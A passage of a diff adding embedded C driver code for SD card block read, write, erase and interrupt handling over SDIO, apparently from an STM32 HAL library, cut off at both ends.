dataremaining--; + *tempbuff = (uint8_t)((data >> 16U) & 0xFFU); + tempbuff++; + dataremaining--; + *tempbuff = (uint8_t)((data >> 24U) & 0xFFU); + tempbuff++; + dataremaining--; + + if(((HAL_GetTick()-tickstart) >= Timeout) || (Timeout == 0U)) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_TIMEOUT; + hsd->State= HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + } + + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_DATA_FLAGS); + + hsd->State = HAL_SD_STATE_READY; + + return HAL_OK; + } + else + { + hsd->ErrorCode |= HAL_SD_ERROR_BUSY; + return HAL_ERROR; + } +} + +/** + * @brief Allows to write block(s) to a specified address in a card. The Data + * transfer is managed by polling mode. + * @note This API should be followed by a check on the card state through + * HAL_SD_GetCardState(). + * @param hsd: Pointer to SD handle + * @param pData: pointer to the buffer that will contain the data to transmit + * @param BlockAdd: Block Address where data will be written + * @param NumberOfBlocks: Number of SD blocks to write + * @param Timeout: Specify timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_WriteBlocks(SD_HandleTypeDef *hsd, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks, uint32_t Timeout) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t tickstart = HAL_GetTick(); + uint32_t count, data, dataremaining; + uint32_t add = BlockAdd; + uint8_t *tempbuff = pData; + + if(NULL == pData) + { + hsd->ErrorCode |= HAL_SD_ERROR_PARAM; + return HAL_ERROR; + } + + if(hsd->State == HAL_SD_STATE_READY) + { + hsd->ErrorCode = HAL_SD_ERROR_NONE; + + if((add + NumberOfBlocks) > (hsd->SdCard.LogBlockNbr)) + { + hsd->ErrorCode |= HAL_SD_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hsd->State = HAL_SD_STATE_BUSY; + + /* Initialize data control register */ + hsd->Instance->DCTRL = 0U; + + if(hsd->SdCard.CardType != CARD_SDHC_SDXC) + { + add *= 512U; + } + + /* Configure the SD DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = NumberOfBlocks * BLOCKSIZE; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_CARD; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hsd->Instance, &config); + + /* Write Blocks in Polling mode */ + if(NumberOfBlocks > 1U) + { + hsd->Context = SD_CONTEXT_WRITE_MULTIPLE_BLOCK; + + /* Write Multi Block command */ + errorstate = SDMMC_CmdWriteMultiBlock(hsd->Instance, add); + } + else + { + hsd->Context = SD_CONTEXT_WRITE_SINGLE_BLOCK; + + /* Write Single Block command */ + errorstate = SDMMC_CmdWriteSingleBlock(hsd->Instance, add); + } + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + + /* Write block(s) in polling mode */ + dataremaining = config.DataLength; +#if defined(SDIO_STA_STBITERR) + while(!__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_TXUNDERR | SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_DATAEND | SDIO_FLAG_STBITERR)) +#else /* SDIO_STA_STBITERR not defined */ + while(!__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_TXUNDERR | SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_DATAEND)) +#endif /* SDIO_STA_STBITERR */ + { + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_TXFIFOHE) && (dataremaining > 0U)) + { + /* Write data to SDIO Tx FIFO */ + for(count = 0U; count < 8U; count++) + { + data = (uint32_t)(*tempbuff); + tempbuff++; + dataremaining--; + data |= ((uint32_t)(*tempbuff) << 8U); + tempbuff++; + dataremaining--; + data |= ((uint32_t)(*tempbuff) << 16U); + tempbuff++; + dataremaining--; + data |= ((uint32_t)(*tempbuff) << 24U); + tempbuff++; + dataremaining--; + (void)SDIO_WriteFIFO(hsd->Instance, &data); + } + } + + if(((HAL_GetTick()-tickstart) >= Timeout) || (Timeout == 0U)) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_TIMEOUT; + } + } + + /* Send stop transmission command in case of multiblock write */ + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DATAEND) && (NumberOfBlocks > 1U)) + { + if(hsd->SdCard.CardType != CARD_SECURED) + { + /* Send stop transmission command */ + errorstate = SDMMC_CmdStopTransfer(hsd->Instance); + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + } + } + + /* Get error state */ + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DTIMEOUT)) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_DATA_TIMEOUT; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + else if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DCRCFAIL)) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_DATA_CRC_FAIL; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + else if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_TXUNDERR)) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_TX_UNDERRUN; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + else + { + /* Nothing to do */ + } + + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_DATA_FLAGS); + + hsd->State = HAL_SD_STATE_READY; + + return HAL_OK; + } + else + { + hsd->ErrorCode |= HAL_SD_ERROR_BUSY; + return HAL_ERROR; + } +} + +/** + * @brief Reads block(s) from a specified address in a card. The Data transfer + * is managed in interrupt mode. + * @note This API should be followed by a check on the card state through + * HAL_SD_GetCardState(). + * @note You could also check the IT transfer process through the SD Rx + * interrupt event. + * @param hsd: Pointer to SD handle + * @param pData: Pointer to the buffer that will contain the received data + * @param BlockAdd: Block Address from where data is to be read + * @param NumberOfBlocks: Number of blocks to read. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_ReadBlocks_IT(SD_HandleTypeDef *hsd, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t add = BlockAdd; + + if(NULL == pData) + { + hsd->ErrorCode |= HAL_SD_ERROR_PARAM; + return HAL_ERROR; + } + + if(hsd->State == HAL_SD_STATE_READY) + { + hsd->ErrorCode = HAL_SD_ERROR_NONE; + + if((add + NumberOfBlocks) > (hsd->SdCard.LogBlockNbr)) + { + hsd->ErrorCode |= HAL_SD_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hsd->State = HAL_SD_STATE_BUSY; + + /* Initialize data control register */ + hsd->Instance->DCTRL = 0U; + + hsd->pRxBuffPtr = pData; + hsd->RxXferSize = BLOCKSIZE * NumberOfBlocks; + +#if defined(SDIO_STA_STBITERR) + __HAL_SD_ENABLE_IT(hsd, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_RXOVERR | SDIO_IT_DATAEND | SDIO_FLAG_RXFIFOHF | SDIO_IT_STBITERR)); +#else /* SDIO_STA_STBITERR not defined */ + __HAL_SD_ENABLE_IT(hsd, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_RXOVERR | SDIO_IT_DATAEND | SDIO_FLAG_RXFIFOHF)); +#endif /* SDIO_STA_STBITERR */ + + if(hsd->SdCard.CardType != CARD_SDHC_SDXC) + { + add *= 512U; + } + + /* Configure the SD DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = BLOCKSIZE * NumberOfBlocks; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_SDIO; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hsd->Instance, &config); + + /* Read Blocks in IT mode */ + if(NumberOfBlocks > 1U) + { + hsd->Context = (SD_CONTEXT_READ_MULTIPLE_BLOCK | SD_CONTEXT_IT); + + /* Read Multi Block command */ + errorstate = SDMMC_CmdReadMultiBlock(hsd->Instance, add); + } + else + { + hsd->Context = (SD_CONTEXT_READ_SINGLE_BLOCK | SD_CONTEXT_IT); + + /* Read Single Block command */ + errorstate = SDMMC_CmdReadSingleBlock(hsd->Instance, add); + } + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Writes block(s) to a specified address in a card. The Data transfer + * is managed in interrupt mode. + * @note This API should be followed by a check on the card state through + * HAL_SD_GetCardState(). + * @note You could also check the IT transfer process through the SD Tx + * interrupt event. + * @param hsd: Pointer to SD handle + * @param pData: Pointer to the buffer that will contain the data to transmit + * @param BlockAdd: Block Address where data will be written + * @param NumberOfBlocks: Number of blocks to write + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_WriteBlocks_IT(SD_HandleTypeDef *hsd, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t add = BlockAdd; + + if(NULL == pData) + { + hsd->ErrorCode |= HAL_SD_ERROR_PARAM; + return HAL_ERROR; + } + + if(hsd->State == HAL_SD_STATE_READY) + { + hsd->ErrorCode = HAL_SD_ERROR_NONE; + + if((add + NumberOfBlocks) > (hsd->SdCard.LogBlockNbr)) + { + hsd->ErrorCode |= HAL_SD_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hsd->State = HAL_SD_STATE_BUSY; + + /* Initialize data control register */ + hsd->Instance->DCTRL = 0U; + + hsd->pTxBuffPtr = pData; + hsd->TxXferSize = BLOCKSIZE * NumberOfBlocks; + + /* Enable transfer interrupts */ +#if defined(SDIO_STA_STBITERR) + __HAL_SD_ENABLE_IT(hsd, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_TXUNDERR | SDIO_IT_DATAEND | SDIO_FLAG_TXFIFOHE | SDIO_IT_STBITERR)); +#else /* SDIO_STA_STBITERR not defined */ + __HAL_SD_ENABLE_IT(hsd, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_TXUNDERR | SDIO_IT_DATAEND | SDIO_FLAG_TXFIFOHE)); +#endif /* SDIO_STA_STBITERR */ + + if(hsd->SdCard.CardType != CARD_SDHC_SDXC) + { + add *= 512U; + } + + /* Write Blocks in Polling mode */ + if(NumberOfBlocks > 1U) + { + hsd->Context = (SD_CONTEXT_WRITE_MULTIPLE_BLOCK| SD_CONTEXT_IT); + + /* Write Multi Block command */ + errorstate = SDMMC_CmdWriteMultiBlock(hsd->Instance, add); + } + else + { + hsd->Context = (SD_CONTEXT_WRITE_SINGLE_BLOCK | SD_CONTEXT_IT); + + /* Write Single Block command */ + errorstate = SDMMC_CmdWriteSingleBlock(hsd->Instance, add); + } + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + + /* Configure the SD DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = BLOCKSIZE * NumberOfBlocks; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_CARD; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hsd->Instance, &config); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Reads block(s) from a specified address in a card. The Data transfer + * is managed by DMA mode. + * @note This API should be followed by a check on the card state through + * HAL_SD_GetCardState(). + * @note You could also check the DMA transfer process through the SD Rx + * interrupt event. + * @param hsd: Pointer SD handle + * @param pData: Pointer to the buffer that will contain the received data + * @param BlockAdd: Block Address from where data is to be read + * @param NumberOfBlocks: Number of blocks to read. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_ReadBlocks_DMA(SD_HandleTypeDef *hsd, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t add = BlockAdd; + + if(NULL == pData) + { + hsd->ErrorCode |= HAL_SD_ERROR_PARAM; + return HAL_ERROR; + } + + if(hsd->State == HAL_SD_STATE_READY) + { + hsd->ErrorCode = HAL_SD_ERROR_NONE; + + if((add + NumberOfBlocks) > (hsd->SdCard.LogBlockNbr)) + { + hsd->ErrorCode |= HAL_SD_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hsd->State = HAL_SD_STATE_BUSY; + + /* Initialize data control register */ + hsd->Instance->DCTRL = 0U; + +#if defined(SDIO_STA_STBITERR) + __HAL_SD_ENABLE_IT(hsd, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_RXOVERR | SDIO_IT_DATAEND | SDIO_IT_STBITERR)); +#else /* SDIO_STA_STBITERR not defined */ + __HAL_SD_ENABLE_IT(hsd, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_RXOVERR | SDIO_IT_DATAEND)); +#endif /* SDIO_STA_STBITERR */ + + /* Set the DMA transfer complete callback */ + hsd->hdmarx->XferCpltCallback = SD_DMAReceiveCplt; + + /* Set the DMA error callback */ + hsd->hdmarx->XferErrorCallback = SD_DMAError; + + /* Set the DMA Abort callback */ + hsd->hdmarx->XferAbortCallback = NULL; + + /* Force DMA Direction */ + hsd->hdmarx->Init.Direction = DMA_PERIPH_TO_MEMORY; + MODIFY_REG(hsd->hdmarx->Instance->CR, DMA_SxCR_DIR, hsd->hdmarx->Init.Direction); + + /* Enable the DMA Channel */ + if(HAL_DMA_Start_IT(hsd->hdmarx, (uint32_t)&hsd->Instance->FIFO, (uint32_t)pData, (uint32_t)(BLOCKSIZE * NumberOfBlocks)/4U) != HAL_OK) + { + __HAL_SD_DISABLE_IT(hsd, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_RXOVERR | SDIO_IT_DATAEND)); + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_DMA; + hsd->State = HAL_SD_STATE_READY; + return HAL_ERROR; + } + else + { + /* Enable SD DMA transfer */ + __HAL_SD_DMA_ENABLE(hsd); + + if(hsd->SdCard.CardType != CARD_SDHC_SDXC) + { + add *= 512U; + } + + /* Configure the SD DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = BLOCKSIZE * NumberOfBlocks; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_SDIO; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hsd->Instance, &config); + + /* Read Blocks in DMA mode */ + if(NumberOfBlocks > 1U) + { + hsd->Context = (SD_CONTEXT_READ_MULTIPLE_BLOCK | SD_CONTEXT_DMA); + + /* Read Multi Block command */ + errorstate = SDMMC_CmdReadMultiBlock(hsd->Instance, add); + } + else + { + hsd->Context = (SD_CONTEXT_READ_SINGLE_BLOCK | SD_CONTEXT_DMA); + + /* Read Single Block command */ + errorstate = SDMMC_CmdReadSingleBlock(hsd->Instance, add); + } + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + + return HAL_OK; + } + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Writes block(s) to a specified address in a card. The Data transfer + * is managed by DMA mode. + * @note This API should be followed by a check on the card state through + * HAL_SD_GetCardState(). + * @note You could also check the DMA transfer process through the SD Tx + * interrupt event. + * @param hsd: Pointer to SD handle + * @param pData: Pointer to the buffer that will contain the data to transmit + * @param BlockAdd: Block Address where data will be written + * @param NumberOfBlocks: Number of blocks to write + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_WriteBlocks_DMA(SD_HandleTypeDef *hsd, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t add = BlockAdd; + + if(NULL == pData) + { + hsd->ErrorCode |= HAL_SD_ERROR_PARAM; + return HAL_ERROR; + } + + if(hsd->State == HAL_SD_STATE_READY) + { + hsd->ErrorCode = HAL_SD_ERROR_NONE; + + if((add + NumberOfBlocks) > (hsd->SdCard.LogBlockNbr)) + { + hsd->ErrorCode |= HAL_SD_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hsd->State = HAL_SD_STATE_BUSY; + + /* Initialize data control register */ + hsd->Instance->DCTRL = 0U; + + /* Enable SD Error interrupts */ +#if defined(SDIO_STA_STBITERR) + __HAL_SD_ENABLE_IT(hsd, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_TXUNDERR | SDIO_IT_STBITERR)); +#else /* SDIO_STA_STBITERR not defined */ + __HAL_SD_ENABLE_IT(hsd, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_TXUNDERR)); +#endif /* SDIO_STA_STBITERR */ + + /* Set the DMA transfer complete callback */ + hsd->hdmatx->XferCpltCallback = SD_DMATransmitCplt; + + /* Set the DMA error callback */ + hsd->hdmatx->XferErrorCallback = SD_DMAError; + + /* Set the DMA Abort callback */ + hsd->hdmatx->XferAbortCallback = NULL; + + if(hsd->SdCard.CardType != CARD_SDHC_SDXC) + { + add *= 512U; + } + + /* Write Blocks in Polling mode */ + if(NumberOfBlocks > 1U) + { + hsd->Context = (SD_CONTEXT_WRITE_MULTIPLE_BLOCK | SD_CONTEXT_DMA); + + /* Write Multi Block command */ + errorstate = SDMMC_CmdWriteMultiBlock(hsd->Instance, add); + } + else + { + hsd->Context = (SD_CONTEXT_WRITE_SINGLE_BLOCK | SD_CONTEXT_DMA); + + /* Write Single Block command */ + errorstate = SDMMC_CmdWriteSingleBlock(hsd->Instance, add); + } + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + + /* Enable SDIO DMA transfer */ + __HAL_SD_DMA_ENABLE(hsd); + + /* Force DMA Direction */ + hsd->hdmatx->Init.Direction = DMA_MEMORY_TO_PERIPH; + MODIFY_REG(hsd->hdmatx->Instance->CR, DMA_SxCR_DIR, hsd->hdmatx->Init.Direction); + + /* Enable the DMA Channel */ + if(HAL_DMA_Start_IT(hsd->hdmatx, (uint32_t)pData, (uint32_t)&hsd->Instance->FIFO, (uint32_t)(BLOCKSIZE * NumberOfBlocks)/4U) != HAL_OK) + { +#if defined(SDIO_STA_STBITERR) + __HAL_SD_DISABLE_IT(hsd, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_TXUNDERR | SDIO_IT_STBITERR)); +#else /* SDIO_STA_STBITERR not defined */ + __HAL_SD_DISABLE_IT(hsd, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_TXUNDERR)); +#endif /* SDIO_STA_STBITERR */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_DMA; + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + return HAL_ERROR; + } + else + { + /* Configure the SD DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = BLOCKSIZE * NumberOfBlocks; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_CARD; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hsd->Instance, &config); + + return HAL_OK; + } + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Erases the specified memory area of the given SD card. + * @note This API should be followed by a check on the card state through + * HAL_SD_GetCardState(). + * @param hsd: Pointer to SD handle + * @param BlockStartAdd: Start Block address + * @param BlockEndAdd: End Block address + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SD_Erase(SD_HandleTypeDef *hsd, uint32_t BlockStartAdd, uint32_t BlockEndAdd) +{ + uint32_t errorstate; + uint32_t start_add = BlockStartAdd; + uint32_t end_add = BlockEndAdd; + + if(hsd->State == HAL_SD_STATE_READY) + { + hsd->ErrorCode = HAL_SD_ERROR_NONE; + + if(end_add < start_add) + { + hsd->ErrorCode |= HAL_SD_ERROR_PARAM; + return HAL_ERROR; + } + + if(end_add > (hsd->SdCard.LogBlockNbr)) + { + hsd->ErrorCode |= HAL_SD_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hsd->State = HAL_SD_STATE_BUSY; + + /* Check if the card command class supports erase command */ + if(((hsd->SdCard.Class) & SDIO_CCCC_ERASE) == 0U) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_REQUEST_NOT_APPLICABLE; + hsd->State = HAL_SD_STATE_READY; + return HAL_ERROR; + } + + if((SDIO_GetResponse(hsd->Instance, SDIO_RESP1) & SDMMC_CARD_LOCKED) == SDMMC_CARD_LOCKED) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= HAL_SD_ERROR_LOCK_UNLOCK_FAILED; + hsd->State = HAL_SD_STATE_READY; + return HAL_ERROR; + } + + /* Get start and end block for high capacity cards */ + if(hsd->SdCard.CardType != CARD_SDHC_SDXC) + { + start_add *= 512U; + end_add *= 512U; + } + + /* According to sd-card spec 1.0 ERASE_GROUP_START (CMD32) and erase_group_end(CMD33) */ + if(hsd->SdCard.CardType != CARD_SECURED) + { + /* Send CMD32 SD_ERASE_GRP_START with argument as addr */ + errorstate = SDMMC_CmdSDEraseStartAdd(hsd->Instance, start_add); + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + return HAL_ERROR; + } + + /* Send CMD33 SD_ERASE_GRP_END with argument as addr */ + errorstate = SDMMC_CmdSDEraseEndAdd(hsd->Instance, end_add); + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + return HAL_ERROR; + } + } + + /* Send CMD38 ERASE */ + errorstate = SDMMC_CmdErase(hsd->Instance); + if(errorstate != HAL_SD_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + hsd->ErrorCode |= errorstate; + hsd->State = HAL_SD_STATE_READY; + return HAL_ERROR; + } + + hsd->State = HAL_SD_STATE_READY; + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief This function handles SD card interrupt request. + * @param hsd: Pointer to SD handle + * @retval None + */ +void HAL_SD_IRQHandler(SD_HandleTypeDef *hsd) +{ + uint32_t errorstate; + uint32_t context = hsd->Context; + + /* Check for SDIO interrupt flags */ + if((__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXFIFOHF) != RESET) && ((context & SD_CONTEXT_IT) != 0U)) + { + SD_Read_IT(hsd); + } + + else if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DATAEND) != RESET) + { + __HAL_SD_CLEAR_FLAG(hsd, SDIO_FLAG_DATAEND); + +#if defined(SDIO_STA_STBITERR) + __HAL_SD_DISABLE_IT(hsd, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR | SDIO_IT_RXOVERR | SDIO_IT_TXFIFOHE |\ + SDIO_IT_RXFIFOHF | SDIO_IT_STBITERR); +#else /* SDIO_STA_STBITERR not defined */ + __HAL_SD_DISABLE_IT(hsd, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR | SDIO_IT_RXOVERR | SDIO_IT_TXFIFOHE |\ + SDIO_IT_RXFIFOHF); +#endif /* SDIO_STA_STBITERR */ + + hsd->Instance->DCTRL &= ~(SDIO_DCTRL_DTEN); + + if((context & SD_CONTEXT_IT) != 0U) + { + if(((context & SD_CONTEXT_READ_MULTIPLE_BLOCK) != 0U) || ((context & SD_CONTEXT_WRITE_MULTIPLE_BLOCK) != 0U)) + { + errorstate = SDMMC_CmdStopTransfer(hsd->Instance); + if(errorstate != HAL_SD_ERROR_NONE) + { + hsd->ErrorCode |= errorstate; +#if defined (USE_HAL_SD_REGISTER_CALLBACKS) && (USE_HAL_SD_REGISTER_CALLBACKS == 1U) + hsd->ErrorCallback(hsd); +#else + HAL_SD_ErrorCallback(hsd); +#endif /* USE_HAL_SD_REGISTER_CALLBACKS */ + } + } + + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_DATA_FLAGS); + + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + if(((context & SD_CONTEXT_READ_SINGLE_BLOCK) != 0U) || ((context & SD_CONTEXT_READ_MULTIPLE_BLOCK) != 0U)) + { +#if defined (USE_HAL_SD_REGISTER_CALLBACKS) && (USE_HAL_SD_REGISTER_CALLBACKS == 1U) + hsd->RxCpltCallback(hsd); +#else + HAL_SD_RxCpltCallback(hsd); +#endif /* USE_HAL_SD_REGISTER_CALLBACKS */ + } + else + { +#if defined (USE_HAL_SD_REGISTER_CALLBACKS) && (USE_HAL_SD_REGISTER_CALLBACKS == 1U) + hsd->TxCpltCallback(hsd); +#else + HAL_SD_TxCpltCallback(hsd); +#endif /* USE_HAL_SD_REGISTER_CALLBACKS */ + } + } + else if((context & SD_CONTEXT_DMA) != 0U) + { + if((context & SD_CONTEXT_WRITE_MULTIPLE_BLOCK) != 0U) + { + errorstate = SDMMC_CmdStopTransfer(hsd->Instance); + if(errorstate != HAL_SD_ERROR_NONE) + { + hsd->ErrorCode |= errorstate; +#if defined (USE_HAL_SD_REGISTER_CALLBACKS) && (USE_HAL_SD_REGISTER_CALLBACKS == 1U) + hsd->ErrorCallback(hsd); +#else + HAL_SD_ErrorCallback(hsd); +#endif /* USE_HAL_SD_REGISTER_CALLBACKS */ + } + } + if(((context & SD_CONTEXT_READ_SINGLE_BLOCK) == 0U) && ((context & SD_CONTEXT_READ_MULTIPLE_BLOCK) == 0U)) + { + /* Disable the DMA transfer for transmit request by setting the DMAEN bit + in the SD DCTRL register */ + hsd->Instance->DCTRL &= (uint32_t)~((uint32_t)SDIO_DCTRL_DMAEN); + + hsd->State = HAL_SD_STATE_READY; + +#if defined (USE_HAL_SD_REGISTER_CALLBACKS) && (USE_HAL_SD_REGISTER_CALLBACKS == 1U) + hsd->TxCpltCallback(hsd); +#else + HAL_SD_TxCpltCallback(hsd); +#endif /* USE_HAL_SD_REGISTER_CALLBACKS */ + } + } + else + { + /* Nothing to do */ + } + } + + else if((__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_TXFIFOHE) != RESET) && ((context & 